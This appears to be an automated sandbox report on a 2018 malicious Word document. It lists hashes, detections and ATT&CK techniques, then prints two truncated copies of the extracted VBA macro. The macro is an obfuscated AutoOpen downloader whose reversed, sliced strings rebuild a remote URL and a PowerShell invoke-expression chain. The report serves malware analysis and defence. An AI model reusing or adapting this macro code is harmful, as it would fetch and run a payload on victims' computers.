Office (OLE) malware analysis — malicious · 1aa7436383c71ed5

MALICIOUS

Office (OLE)

98.5 KB Created: 2018-02-07 17:08:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: 49151982cfa0e86eba55b5103fd95120 SHA-1: 902e71658a6fbddcf4104d1d7d6eddf225bedfce SHA-256: 1aa7436383c71ed5bc878e1e52bf66a017cb6b82b4ee6fbe23b67b11403efadc

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious OLE document containing VBA macros. The AutoOpen macro is present and uses the Shell() function, indicating an attempt to execute arbitrary commands. This is a common technique for downloading and executing further malicious content. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' suggests a phishing lure, but the specific payload is not discernible from the provided evidence.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 22784 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	22784 bytes
SHA-256: `41d1ab2f9dd493fa96440a052c26133a76262b3b5995415c718722cadf4ca036`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "OmfpDqp" Sub AutoOpen() On Error Resume Next KWfTOWEbZ = jlHZqvzRnMSV - hwTiIXoWiKwLFR / (129574 + jSzYimm - 3915098 + ikAvCzipZwVusw) DkOAbLOli = MHuVzNuLzkZnna - LSWfSfKoVtn / (3846718 + LJfzFBjvEIrM - 783369 + vHXQwoUP) tsGLTBTYb = tIzqFbhm - kGJiSOVPjwdrf / (3318159 + PnruhicjjiSvKE - 377695 + jKwkJjOnwwlmaw) Application.Run "nKcBnvWItv", lhXTAVLqjs ROrDaSkmE = HacvzTKL - CtjjjmjZDzj / (9346926 + FiQEEGijKwGqc - 6628002 + SndoaHXE) lhKRttjpU = SVuivODj - rzZqEEZGQTvVih / (5686263 + XupkqiHmfKN - 2261331 + sPktMfHLqGNTn) End Sub Function lhXTAVLqjs() On Error Resume Next JjqkiNtTv = cwdlEKAtwGrd - hiktGcbLzI / (4887631 + chizlITJBjza - 6471553 + BjUikodYDO) MMBjkpkfs = kJdvaiqD - bcRuKzXTWwjJLh / (5074349 + qPYlIEiUnBwpOa - 853178 + WhwYOaXm) pjbFo = JBEhCYbDA - PRSrXwzHIwhF / (9305402 + ZndkBjQrlUwDZm - 6976515 + WmNqopEqZaQ) ctwFjdw = qfGwkszdQGW + Mid(StrReverse("ikaKjoWkAfEKJiqalzdzADCjaQtLiOdLLFtpZFtp+FtVk5+VkfoNUjp"), 7, 16) WFLtjs = BUUYjztUYLWfb - rGFkinLbPwcwlt / (9668753 + iUhfktWQJ - 1186963 + FBFwjLmNwFYjHj) vwqEYYKu = EXvhMAVKhCw - LzjoacqFZKztmz / (6064603 + JFnZzJpwUbuwjr - 4601918 + kPbQORzDQaAtXC) PkaDAijsz = MUWAbOYwCHlTwi - WimFIXXPksIjJY / (1628155 + bSjhbNqwjMSYId - 9453461 + VWESGRtXoFlISi) KBtZF = OniEEKIPv + Mid(StrReverse("vuITYvEknDNwzCRqEnCN+FtpmoFtp+Ftpc.sFtp+Ftpe8Db+8Dbl8'+'Db+8DbasorFtp+Ftpoi8Db+8DbgelFtp+FtpoFt'+'p+FtpcFtVk5+Vk5p+Ftp//:pttVk5+Vk5h?/oIMPsBzMMjTwuOba"), 14, 117) vIRWZVqwki = qZwEzGHuJOmUp - JZIsWbhdBzuiw / (3770467 + jTDvaQszTpwiNJ - 3025609 + DEWAcJJwhKM) lLroOFbGil = zJUKnzduiY - YQbpCXzTU / (7306126 + raZSTWKHOQ - 845801 + wJVoqOfUtf) zXzfa = zjAUGYkqrliSt - UfGkbKwUvdjh / (6857586 + FpRaMlb - 6757607 + CDiiaMjTqb) BVmmEEYWt = XtLJBSBSI + Mid(StrReverse("qRiNWJSpItELPER.)93]RahC[]gNiRtS[,)68]RahC[+701]RahC[+35]RahC[((EcALPER.)8Db ))93]raHc'+'[8Db+8Db,Vk5FtpVk5ecAlPeRc-63]raHc[,VnRtGjkCJRorVQwQsUr"), 19, 115) PZbjcilF = nWnZpikCUDG - IlLDjtjX / (1398285 + KqFjjVQj - 1703335 + vwvzPdtzpKOPj) iaztXsCZjd = ukXUDYoTWb - zUIuPlnv / (3016968 + KqOoDzjh - 9334902 + vGllwwvdkCbbTl) ZFtdO = IkFaYaUTH - uIjAYIlZdQqj / (4559799 + QqKKMkjWdXuPbG - 4551957 + andADpPcLu) DmwKIvZiUfG = WjYkRUq + Mid(StrReverse("ztjUjETtqzjaOSjk5+Vk5+78]R'+'8Db+8DbaHC[((ECalper.)29]RVk5+Vk5aHC[]VtHiStsaktkuTaI"), 15, 53) hRfpz = YfIFJji - GqDGWsb / (5215782 + zSuhjIzVCSzp - 1374512 + jGzfJGXCN) zURQcAJ = zkiWSqRi - iKocTsXL / (6987795 + OhNzZXzX - 2371116 + UKwEiiwda) hkMdDuGXnRu = MBOhZGs - fnlvmvzimkF / (9834447 + SEQnXNjul - 9203379 + khtNSfaSfVrYjY) sYlwFLToR = BqUaZMJJiQJGW + Mid(StrReverse("QtKbJRotjwizobEFtp+F'+'tpvxe.Ftp+FtpiEv( + BFtp+FtpS'Y"), 2, 40) KNQGLCh = uBsIjurrLEBmLH - nTzbjkOz / (2368931 + qpkWJwAQTkY - 4928177 + mzjoNTzSro) szPVnFSv = kHlRQOj - jdsEHVB / (1217529 + VrXmNzK - 5914267 + vAjMLwBkmBMiAF) stDvB = VttusZS - MwzzRNWK / (5221502 + RSfWTRtDXjAtT - 4175645 + TRUEQmZcpTOO) BoqzwfLvRpz = BFDvLXbjtw + Mid(StrReverse("iMZMocdicmiGHakwiqXVNuMzDaWVvnIijvsij"), 7, 3) OZoYUOOoJoY = jLTibNw - CGKBrpqDFCuTAU / (1826540 + XmAvSvcP - 9343434 + tiAjnllZNk) ZjzINdzdvl = urwhvUYFVBP - LHoMCiG / (5702995 + ETwMDVPJiaGYhd - 9068884 + OWbEKaV) SlXYnuWTuAP = coczYjvGHjp - zVswJwnaIc / (5794913 + tJoHfZkdzSj - 2742232 + PkzfARAoXEtic) VodwCcAZ = jWPrlvimXwZbAp + Mid(StrReverse("IzwrvCUuWb)''nIoJ-]2,11,3[emaN.)'Rdm' eLbairAV((. \| )93]RAhc[]GNIrts[,'8Db'(ECaLpEr.)') )63]RahC[]gNiRtS[,8DbN'+'Pt8Db(EcAaccoovWrWrSjkXPzDJs"), 20, 114) rERFLlS = ahliFtMo - HKdoWFvdCiXqCz / (6932932 + tKUErZk - 950914 + wWIzWABwzNo) BCcTXAzl = KjKzJYCYUXkB - MjrkDiaYMZi / (7499502 + fiWsDjvWiaK - 833219 + BhjHZmGZKRJN) Wojpzv = fOIwKcMjsYCbTA - EdJjjVj / (8590313 + EzvjEVMMfHDjN - 7065077 + irBJJdfFl) cQJEh = NmuVzKzFPunahv + Mid(StrReverse("jQZBzwfzj+uNAAKdjDvjCojLmTIJ"), 19 ... (truncated)

SHA-256: 41d1ab2f9dd493fa96440a052c26133a76262b3b5995415c718722cadf4ca036

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "OmfpDqp"
Sub AutoOpen()
On Error Resume Next
KWfTOWEbZ = jlHZqvzRnMSV - hwTiIXoWiKwLFR / (129574 + jSzYimm - 3915098 + ikAvCzipZwVusw)
DkOAbLOli = MHuVzNuLzkZnna - LSWfSfKoVtn / (3846718 + LJfzFBjvEIrM - 783369 + vHXQwoUP)
tsGLTBTYb = tIzqFbhm - kGJiSOVPjwdrf / (3318159 + PnruhicjjiSvKE - 377695 + jKwkJjOnwwlmaw)
Application.Run "nKcBnvWItv", lhXTAVLqjs
ROrDaSkmE = HacvzTKL - CtjjjmjZDzj / (9346926 + FiQEEGijKwGqc - 6628002 + SndoaHXE)
lhKRttjpU = SVuivODj - rzZqEEZGQTvVih / (5686263 + XupkqiHmfKN - 2261331 + sPktMfHLqGNTn)
End Sub
Function lhXTAVLqjs()
On Error Resume Next
JjqkiNtTv = cwdlEKAtwGrd - hiktGcbLzI / (4887631 + chizlITJBjza - 6471553 + BjUikodYDO)
MMBjkpkfs = kJdvaiqD - bcRuKzXTWwjJLh / (5074349 + qPYlIEiUnBwpOa - 853178 + WhwYOaXm)
pjbFo = JBEhCYbDA - PRSrXwzHIwhF / (9305402 + ZndkBjQrlUwDZm - 6976515 + WmNqopEqZaQ)
ctwFjdw = qfGwkszdQGW + Mid(StrReverse("ikaKjoWkAfEKJiqalzdzADCjaQtLiOdLLFtpZFtp+FtVk5+VkfoNUjp"), 7, 16)
WFLtjs = BUUYjztUYLWfb - rGFkinLbPwcwlt / (9668753 + iUhfktWQJ - 1186963 + FBFwjLmNwFYjHj)
vwqEYYKu = EXvhMAVKhCw - LzjoacqFZKztmz / (6064603 + JFnZzJpwUbuwjr - 4601918 + kPbQORzDQaAtXC)
PkaDAijsz = MUWAbOYwCHlTwi - WimFIXXPksIjJY / (1628155 + bSjhbNqwjMSYId - 9453461 + VWESGRtXoFlISi)
KBtZF = OniEEKIPv + Mid(StrReverse("vuITYvEknDNwzCRqEnCN+FtpmoFtp+Ftpc.sFtp+Ftpe8Db+8Dbl8'+'Db+8DbasorFtp+Ftpoi8Db+8DbgelFtp+FtpoFt'+'p+FtpcFtVk5+Vk5p+Ftp//:pttVk5+Vk5h?/oIMPsBzMMjTwuOba"), 14, 117)
vIRWZVqwki = qZwEzGHuJOmUp - JZIsWbhdBzuiw / (3770467 + jTDvaQszTpwiNJ - 3025609 + DEWAcJJwhKM)
lLroOFbGil = zJUKnzduiY - YQbpCXzTU / (7306126 + raZSTWKHOQ - 845801 + wJVoqOfUtf)
zXzfa = zjAUGYkqrliSt - UfGkbKwUvdjh / (6857586 + FpRaMlb - 6757607 + CDiiaMjTqb)
BVmmEEYWt = XtLJBSBSI + Mid(StrReverse("qRiNWJSpItELPER.)93]RahC[]gNiRtS[,)68]RahC[+701]RahC[+35]RahC[((EcALPER.)8Db ))93]raHc'+'[8Db+8Db,Vk5FtpVk5ecAlPeRc-63]raHc[,VnRtGjkCJRorVQwQsUr"), 19, 115)
PZbjcilF = nWnZpikCUDG - IlLDjtjX / (1398285 + KqFjjVQj - 1703335 + vwvzPdtzpKOPj)
iaztXsCZjd = ukXUDYoTWb - zUIuPlnv / (3016968 + KqOoDzjh - 9334902 + vGllwwvdkCbbTl)
ZFtdO = IkFaYaUTH - uIjAYIlZdQqj / (4559799 + QqKKMkjWdXuPbG - 4551957 + andADpPcLu)
DmwKIvZiUfG = WjYkRUq + Mid(StrReverse("ztjUjETtqzjaOSjk5+Vk5+78]R'+'8Db+8DbaHC[((ECalper.)29]RVk5+Vk5aHC[]VtHiStsaktkuTaI"), 15, 53)
hRfpz = YfIFJji - GqDGWsb / (5215782 + zSuhjIzVCSzp - 1374512 + jGzfJGXCN)
zURQcAJ = zkiWSqRi - iKocTsXL / (6987795 + OhNzZXzX - 2371116 + UKwEiiwda)
hkMdDuGXnRu = MBOhZGs - fnlvmvzimkF / (9834447 + SEQnXNjul - 9203379 + khtNSfaSfVrYjY)
sYlwFLToR = BqUaZMJJiQJGW + Mid(StrReverse("QtKbJRotjwizobEFtp+F'+'tpvxe.Ftp+FtpiEv( + BFtp+FtpS'Y"), 2, 40)
KNQGLCh = uBsIjurrLEBmLH - nTzbjkOz / (2368931 + qpkWJwAQTkY - 4928177 + mzjoNTzSro)
szPVnFSv = kHlRQOj - jdsEHVB / (1217529 + VrXmNzK - 5914267 + vAjMLwBkmBMiAF)
stDvB = VttusZS - MwzzRNWK / (5221502 + RSfWTRtDXjAtT - 4175645 + TRUEQmZcpTOO)
BoqzwfLvRpz = BFDvLXbjtw + Mid(StrReverse("iMZMocdicmiGHakwiqXVNuMzDaWVvnIijvsij"), 7, 3)
OZoYUOOoJoY = jLTibNw - CGKBrpqDFCuTAU / (1826540 + XmAvSvcP - 9343434 + tiAjnllZNk)
ZjzINdzdvl = urwhvUYFVBP - LHoMCiG / (5702995 + ETwMDVPJiaGYhd - 9068884 + OWbEKaV)
SlXYnuWTuAP = coczYjvGHjp - zVswJwnaIc / (5794913 + tJoHfZkdzSj - 2742232 + PkzfARAoXEtic)
VodwCcAZ = jWPrlvimXwZbAp + Mid(StrReverse("IzwrvCUuWb)''nIoJ-]2,11,3[emaN.)'*Rdm*' eLbairAV((. | )93]RAhc[]GNIrts[,'8Db'(ECaLpEr.)') )63]RahC[]gNiRtS[,8DbN'+'Pt8Db(EcAaccoovWrWrSjkXPzDJs"), 20, 114)
rERFLlS = ahliFtMo - HKdoWFvdCiXqCz / (6932932 + tKUErZk - 950914 + wWIzWABwzNo)
BCcTXAzl = KjKzJYCYUXkB - MjrkDiaYMZi / (7499502 + fiWsDjvWiaK - 833219 + BhjHZmGZKRJN)
Wojpzv = fOIwKcMjsYCbTA - EdJjjVj / (8590313 + EzvjEVMMfHDjN - 7065077 + irBJJdfFl)
cQJEh = NmuVzKzFPunahv + Mid(StrReverse("jQZBzwfzj+uNAAKdjDvjCojLmTIJ"), 19
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.